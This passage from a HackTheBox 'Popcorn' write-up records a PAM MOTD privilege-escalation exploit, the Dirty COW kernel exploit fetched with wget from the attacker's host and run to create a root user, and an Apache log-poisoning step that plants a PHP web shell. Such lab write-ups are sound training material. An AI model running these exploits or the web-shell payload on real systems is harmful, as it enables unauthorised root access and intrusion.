</pre></table></code></div></div><ul><li><code class="language-plaintext highlighter-rouge">motd.legal-displayed</code></ul><li>What is <code class="language-plaintext highlighter-rouge">motd.legal-displayed</code><ul><li>MOTD is the abbreviation of “Message Of The Day”, and it is used to display a message when a remote user login to the Linux Operating system using SSH.</ul><li><p>Search exploits for <code class="language-plaintext highlighter-rouge">motd</code></p><div class="table-wrapper"><table><thead><tr><th>Exploit Title<th>Path<tbody><tr><td>Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)<td>linux/local/14273.sh<tr><td>Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)<td>linux/local/14339.sh</table></div><li>How does <code class="language-plaintext highlighter-rouge">pam_motd</code> exploit work?<ul><li>pam_motd (aka the MOTD module) in libpam-modules before <code class="language-plaintext highlighter-rouge">1.1.0-2ubuntu1.1</code> in PAM on Ubuntu 9.10 and libpam-modules before <code class="language-plaintext highlighter-rouge">1.1.1-2ubuntu5</code> in PAM on Ubuntu 10.04 LTS<li>Allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the <code class="language-plaintext highlighter-rouge">motd.legal-notice</code> file.</ul><li>Check <code class="language-plaintext highlighter-rouge">pam</code> version<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre> www-data@popcorn:/home/george$ dpkg -l | grep pam
 ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
 ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
 ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library
</pre></table></code></div></div><ul><li><code class="language-plaintext highlighter-rouge">1.1.0</code></ul><li>Try <code class="language-plaintext highlighter-rouge">linux/local/14339.sh</code>,<ol><li>Transfer <code class="language-plaintext highlighter-rouge">14339.sh</code> to <code class="language-plaintext highlighter-rouge">popcorn.htb</code><li>Change permissions<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ chmod +x 14339.sh    
</pre></table></code></div></div><li>Exploit!<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ bash 14339.sh 
 [*] Ubuntu PAM MOTD local root
 [*] Backuped /var/www/.ssh/authorized_keys
 [*] SSH key set up
 [*] Backuped /var/www/.cache
 [*] spawn ssh
 [+] owned: /etc/passwd
 [*] spawn ssh
 [+] owned: /etc/shadow
 [*] Restored /var/www/.cache
 [*] Restored /var/www/.ssh/authorized_keys
 [*] SSH key removed
 [+] Success! Use password toor to get root
 Password: 
 root@popcorn:/tmp# id;whoami
 uid=0(root) gid=0(root) groups=0(root)
 root
 root@popcorn:/tmp# 
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918185408.png" alt="" data-proofer-ignore></p></ol></ol><h1 id="privilege-escalation---2">Privilege Escalation - 2</h1><h2 id="root----kernel-exploit-dirty-c0w">Root - Kernel Exploit (Dirty c0w) <a href="#root----kernel-exploit-dirty-c0w" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Identify kernel version<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre> www-data@popcorn:/home/george$ uname -a
 Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 www-data@popcorn:/home/george$ 
</pre></table></code></div></div><ul><li><code class="language-plaintext highlighter-rouge">2.6.31</code> - susceptible to dirtyc0w kernel exploit</ul><li>Try <code class="language-plaintext highlighter-rouge">dirtyc0w</code> exploit<ol><li>Download <a href="https://www.exploit-db.com/exploits/40839"><code class="language-plaintext highlighter-rouge">dirty.c</code></a><li>Transfer to <code class="language-plaintext highlighter-rouge">popcorn.htb</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ wget 10.10.14.14/dirty.c
 --2022-09-18 13:26:39--  http://10.10.14.14/dirty.c
</pre></table></code></div></div><li>Compile <code class="language-plaintext highlighter-rouge">dirty.c</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
 www-data@popcorn:/tmp$ chmod +x dirty 
</pre></table></code></div></div><li>Exploit<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ ./dirty password                 
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password: password    
 Complete line:                             
 firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
		                                           
 mmap: b78a6000       		                
</pre></table></code></div></div><li>Switch to <code class="language-plaintext highlighter-rouge">firefart (root)</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre> www-data@popcorn:/tmp$ su firefart        
 Password:                                 
 firefart@popcorn:/tmp# id;whoami          
 uid=0(firefart) gid=0(root) groups=0(root)
 firefart                                  
 firefart@popcorn:/tmp#  
</pre></table></code></div></div><li>OR SSH w/ <code class="language-plaintext highlighter-rouge">firefart:password</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]  
 └─# sshpass -p 'password' ssh firefart@popcorn.htb     
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918183127.png" alt="" data-proofer-ignore></p></ol></ol><h1 id="additional">Additional</h1><h2 id="lfi2rce---apache-log-files">LFI2RCE - Apache Log Files <a href="#lfi2rce---apache-log-files" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Earlier we tried to poison apache log files, it failed because user <code class="language-plaintext highlighter-rouge">www-data</code> has insufficient permissions, if we were to change permissions so that <code class="language-plaintext highlighter-rouge">www-data</code> can execute it, it would have worked.<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre> root@popcorn:/var/log# ls -la | grep apache2
 drwxrw----  2 root      adm     4096 2022-09-18 14:55 apache2

 root@popcorn:/var/log/apache2# ls -la /var/log/apache2/access.log 
 -rw-r----- 1 root adm 398300 2022-09-18 14:21 /var/log/apache2/access.log
</pre></table></code></div></div><li>Change permissions<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre> root@popcorn:/var/log/apache2# chown -R www-data:www-data apache2/
	
 root@popcorn:/var/log# ls -la | grep apache2
 drwxrw----  2 www-data  www-data    4096 2022-09-18 15:21 apache2
</pre></table></code></div></div><li>Poison apache logs<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
 └─#  curl "http://popcorn.htb/" -H "User-Agent: &lt;?php system(\$_GET['c']); ?&gt;"
 &lt;html&gt;&lt;body&gt;&lt;h1&gt;It works!&lt;/h1&gt;
 &lt;p&gt;This is the default web page for this server.&lt;/p&gt;
 &lt;p&gt;The web server software is running but no content has been added, yet.&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
</pre></table></code></div></div><li>Move <code class="language-plaintext highlighter-rouge">/var/log/apache2/access.log</code> to <code class="language-plaintext highlighter-rouge">/var/www/log.php</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=/var/log/apache2/access.log&amp;newfilename=/var/www/log.php 
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918202448.png" alt="" data-proofer-ignore></p><li>The same can be done for SSH Log poisoning<li>Demo - LFI2RCE Apache log file poisoning<div style="width:100%;height:0px;position:relative;padding-bottom:102.273%;"><iframe src="https://streamable.com/e/pdp0zs" frameborder="0" width="100%" height="100%" allowfullscreen="" style="width:100%;height:100%;position:absolute;left:0px;top:0px;overflow:hidden;"></iframe></div></ol></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/hackthebox-linux/'>HackTheBox - Linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux-priv-esc-kernel-exploit/" class="post-tag no-text-decoration" >linux-priv-esc/kernel-exploit</a> <a href="/tags/exploit-file-upload-bypass/" class="post-tag no-text-decoration" >exploit/file-upload-bypass</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - Popcorn - Yufong&amp;u=https://yufongg.github.io/posts/Popcorn/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="" data-toggle="tooltip" data-placement="top" title="" target="_blank" rel="noopener" aria-label=""> <i class="fa-fw "></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recent Update</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Blunder/">HackTheBox - Blunder</a><li><a href="/posts/Attacktive-Directory/">TryHackMe - Attacktive Directory</a><li><a href="/posts/Tommy-Boy-1/">Vulnhub - Tommy Boy 1</a><li><a href="/posts/Tiki-1/">Vulnhub - Tiki 1</a><li><a href="/posts/Breach-1/">Vulnhub - Breach 1</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/tcp-80-http-web-app-cms-exploit/">tcp/80-http/web-app-cms-exploit</a> <a class="post-tag" href="/tags/linux-priv-esc-linux-creds-found/">linux-priv-esc/linux-creds-found</a> <a class="post-tag" href="/tags/exploit-file-inclusion-lfi/">exploit/file-inclusion/lfi</a> <a class="post-tag" href="/tags/linux-priv-esc-sudo-gtfo-bin/">linux-priv-esc/sudo/gtfo-bin</a> <a class="post-tag" href="/tags/exploit-command-injection/">exploit/command-injection</a> <a class="post-tag" href="/tags/linux-priv-esc-kernel-exploit/">linux-priv-esc/kernel-exploit</a> <a class="post-tag" href="/tags/cryptography/">cryptography</a> <a class="post-tag" href="/tags/exploit-sqli-database-enum/">exploit/sqli/database-enum</a> <a class="post-tag" href="/tags/pivot/">pivot</a> <a class="post-tag" href="/tags/exploit-file-upload-bypass/">exploit/file-upload-bypass</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/UpDown/"><div class="card-body"> <em class="timeago small" data-ts="1674403200" > 2023-01-23 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - UpDown</h3><div class="text-muted small"><p> Overview This machine begins w/ a web enumeration, /dev/.git is discovered, since .git is found, we are able to view the logs and commits of the git repository, providing us w/ the header needed to...</p></div></div></a></div><div class="card"> <a href="/posts/OpenSource/"><div class="card-body"> <em class="timeago small" data-ts="1655827200" > 2022-06-22 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - OpenSource</h3><div class="text-muted small"><p> Overview This machine is hosting a webpage that allows user to test a file upload web application and download its source code. However, the source code is archived together with a directory .git, ...</p></div></div></a></div><div class="card"> <a href="/posts/Lame/"><div class="card-body"> <em class="timeago small" data-ts="1660665600" > 2022-08-17 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Lame</h3><div class="text-muted small"><p> Overview HackTheBox Lame marks the beginning of me trying to complete TJNull’s OSCP List for HackTheBox. This machine begins w/ nmap detecting a service exploit for distcc v1 that allows command e...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Unlock-Post/" class="btn btn-outline-primary" prompt="Older"><p>HackTheBox - Unlock Password Protected Post</p></a> <a href="/posts/Haircut/" class="btn btn-outline-primary" prompt="Newer"><p>HackTheBox - Haircut</p></a></div><div id="disqus_thread" class="pt-2 pb-2"><p class="text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script type="text/javascript"> var disqus_config = function () { this.page.url = 'https://yufongg.github.io/posts/Popcorn/'; this.page.identifier = '/posts/Popcorn/'; }; /* Lazy loading */ var disqus_observer = new IntersectionObserver(function (entries) { if(entries[0].isIntersecting) { (function () { var d = document, s = d.createElement('script'); s.src = 'https://yufongg-github-io.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); disqus_observer.disconnect(); } }, { threshold: [0] }); disqus_observer.observe(document.querySelector('#disqus_thread')); /* Auto switch theme */ function reloadDisqus() { /* Disqus hasn't been loaded */ if (typeof DISQUS === "undefined") { return; } if (document.readyState == 'complete') { DISQUS.reset({ reload: true, config: disqus_config }); } } const modeToggle = document.querySelector(".mode-toggle"); if (typeof modeToggle !== "undefined") { /* modeToggle.addEventListener('click', reloadDisqus); // not pretty for 'color-scheme' */ window.matchMedia('(prefers-color-scheme: dark)').addEventListener('change', reloadDisqus); } </script></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/yufongg">yufongg</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/tcp-80-http-web-app-cms-exploit/">tcp/80-http/web-app-cms-exploit</a> <a class="post-tag" href="/tags/linux-priv-esc-linux-creds-found/">linux-priv-esc/linux-creds-found</a> <a class="post-tag" href="/tags/exploit-file-inclusion-lfi/">exploit/file-inclusion/lfi</a> <a class="post-tag" href="/tags/linux-priv-esc-sudo-gtfo-bin/">linux-priv-esc/sudo/gtfo-bin</a> <a class="post-tag" href="/tags/exploit-command-injection/">exploit/command-injection</a> <a class="post-tag" href="/tags/linux-priv-esc-kernel-exploit/">linux-priv-esc/kernel-exploit</a> <a class="post-tag" href="/tags/cryptography/">cryptography</a> <a class="post-tag" href="/tags/exploit-sqli-database-enum/">exploit/sqli/database-enum</a> <a class="post-tag" href="/tags/pivot/">pivot</a> <a class="post-tag" href="/tags/exploit-file-upload-bypass/">exploit/file-upload-bypass</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-LS5TVPBBZE"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-LS5TVPBBZE'); }); </script>
